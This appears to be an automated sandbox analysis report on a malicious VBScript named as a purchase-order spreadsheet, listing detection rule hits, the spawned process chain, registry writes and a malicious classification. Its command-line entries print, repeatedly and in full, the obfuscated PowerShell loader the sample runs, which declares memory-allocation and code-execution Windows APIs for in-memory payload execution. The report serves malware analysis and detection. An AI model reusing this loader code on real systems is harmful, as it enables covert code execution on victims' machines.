opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuJump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: lysreklamerne.ShellExecute Blindtabletter, " " & chrw(34) & ap6 & chrw(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5576
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5576Jump to behavior
Source: PO-09784893 xlsx.vbs, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_4180.amsi.csv, type: OTHERMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: PO-09784893 xlsx.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_078135D83_2_078135D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_078100403_2_07810040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_078135CB3_2_078135CB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdlineJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_daxdyhsl.wnc.ps1Jump to behavior
Source: classification engineClassification label: mal84.expl.evad.winVBS@11/9@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: ek8C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.pdb source: powershell.exe, 00000003.00000002.848043775.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Treetise\Fejltolkningens160\Helaftensfilmens", "cQGbcQGbuk1LEn5xAZvrAqcvgfJYOfUa6wLu1+sCofeBwitXGpvrAprL6wJhUesCrspxAZvr", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Saudiarabiske = """KoAEldMedPo-CeTph", "", "", "0")
Obfuscated command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdlineJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
